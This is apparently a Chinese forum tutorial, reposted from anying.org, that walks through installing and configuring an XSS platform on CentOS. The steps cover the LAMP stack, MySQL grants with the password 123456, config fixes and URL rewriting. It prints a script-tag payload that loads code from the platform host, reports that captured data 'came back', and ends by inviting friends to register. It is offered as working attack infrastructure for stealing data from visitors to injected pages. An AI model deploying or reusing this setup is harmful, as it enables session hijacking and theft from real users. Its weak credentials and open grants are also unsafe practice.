作者：Route 来源：www.anying.org 转载请注明，违者必究
原文：http://www.anying.org/thread-43215-1-1.html

这次xss平台搭建选用的是centos系统，其他linux也差不多。
0x01 LAMP环境的搭建
首先是下载apache的环境，centos已经集成好了。

然后当然是一大堆信息，最后显示Complete!成功了

然后安装php环境，可以解析php的内容。

OK，安装完毕，我们测试下，centos中安装完apache默认的网站根路径在/var/www/html/下，我们建立一个index.php文件作为测试：

使用vim打开，我们填入phpinfo函数

当然就是这样，打开HTTP服务测试页面：

有一个报错，是因为没有配置域名，只要在/etc/httpd/conf/httpd.conf文件中配置ServiceName就不会报错了。等下修改配置apache配置文件的时候一起截图。OK，测试一下，phpinfo的页面出来了

然后当然是数据库的支持，首先要下载mysql数据库

两个组件，一个mysql连接器一个服务器。
下载完数据库首先要将数据库初始化一下，

使用
service mysqld start 
首次启动mysql初始化，再使用
mysqladmin -u root password '密码'
给root设置一个密码。
OK数据库就安装完成，接着安装php对数据库的支持。

重启apache服务，刷新phpinfo页面




往下翻，找到这两个说明php和mysql已经连接完成了。LAMP环境搭建完毕。

0x02 让xss跑起来
上传xss的源码。并解压。

很简单的命令，你懂的。


OK，文件齐全，下面开始配置。
首先要给xss环境准备一个数据库和数据库的用户（当然也能用root，用root麻烦会少一点）
进入数据库配置：

mysql -u root -p
链接进入本地数据库。

创建了xss数据库和xsser用户，xsser用户的密码设定为123456
刚刚创建的xsser用户 是没有权限的。我们把xss数据库的所有权限赋给xsser。


GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'%' IDENTIFIED BY '123456';
OK，数据库基础准备好了，我们去修改下config文件，让xss平台能和数据库交互。

用vim打开config.php

这里几个部分修改下。改完如下：

下面把xss平台的初始数据(xssplantform.sql文件)导入进我们的mysql

OK查看下数据库

都有了，当然，还差一个文件权限的问题。现在访问是空白

可以看到整个文件都是属于root的，所以我们改变下权限，让他属于apache的内建用户apache。



OK都是apache的了。
刷新下页面

到此我们的平台跑起来了。
0x03 蛋疼的调整们
当然，现在点注册还是没有效果的，还需要做一些修改
首先进入数据库，将oc_module中的内容改为自己的IP或域名

然后这里旧版本的源码需要把/var/www/html/themes/default/templates/register.html里面53行的button改为submit。


改完为了保险起见，把/var/www/html/templates_c/目录下的临时文件删除。重启httpd。

重新打开我们的网页，OK可以注册了。



但是这里注册的时候会出这样的问题。

好吧，这个问题我拍错的时候搞了半天，问题有点奇葩，先说解决方法吧，在config.php文件里面，将第九行的数据库地址改成localhost。

因为我搭建了不止一次，在写文章的时候把数据库地址改成127就报错，改成localhost就OK。当然，不排除改成localhost以后还会报错的情况，如果出现还报错的情况，我从我经验上来讲（因为没想通原理），用root用户连上数据库，加上这样一句话：
GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'localhost' IDENTIFIED BY '123456';
给数据库用户赋予一个本地登录权限，再进行测试，如果还是不行，把config.php文件里面的用户改成root用户，再测试。当然这里面的每一步修改都需要重启apache服务器。
别忘记命令：
service httpd restart
千辛万苦，终于看到了



0x04 这是最后....最后...

好，终于进入最后一步，测试XSS能否使用，并邀请小伙伴们注册。

来创建一个项目吧。



当然，我的项目代码在这里也显示了，复制出来
<script src=http://192.168.4.32/xssplatform/TNMaJe?1377587267></script>
测试一下：

打开它，看看x到没，哎呦我去，貌似没有- -。

分析一下

404了，想了下，可能是url重写的问题，在网站根目录下，创建一个.htaccess的隐藏文件

直接给出内容吧：

<IfModule mod_rewrite.c>
        RewriteEngine on
        RewriteRule ^([0-9a-zA-Z]{6})$ index.php?do=code&urlKey=$1
        RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ index.php?do=do&auth=$1&domain=$3
        RewriteRule ^register/(.*?)$ index.php?do=register&key=$1 
        RewriteRule ^register-validate/(.*?)$ index.php?do=register&act=validate&key=$1
        RewriteRule ^login$ index.php?do=login
</IfModule>
还记得，去修改下/etc/http/conf/httpd.conf文件

搜索一下AllowOverride，应该是在这里，把None改成All。

重启下httpd服务，我们要开始了。


抓包显示访问都正常了

最想要的东西也回来了。
好东西怎么能一个人独享，赶快叫小伙伴们来加入吧。
将config.php文件改下：

还记得他吧，然后给我们自己的用户加上可以邀请的权限，连接下数据库，

好吧，为了测试我创建了很多用户，我们现在用的是nimei这个用户，需要把他的adminLevel权限改成1

UPDATE oc_user SET adminLevel=1 WHERE id=4;
把自己的用户登出再登陆一下，访问
http://192.168.4.32/xssplatform/index.php?do=user&act=invite
这个页面

发给小伙伴，来注册吧